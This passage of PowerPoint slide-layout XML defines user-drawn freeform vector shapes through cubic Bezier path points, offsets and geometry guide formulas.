                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="200"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>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10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="160" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160"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50"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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4" y="72"/>
                      <a:pt x="91" y="75"/>
                      <a:pt x="87" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="141"/>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="37"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70" y="170"/>
                      <a:pt x="69" y="173"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="98"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="46"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>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7"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97"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6"/>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231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5762" y="3343"/>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232"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5774" y="3343"/>
                <a:ext cx="5" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0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1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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233"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="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240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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245"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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8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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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251"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="13"/>
                <a:ext cx="188" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
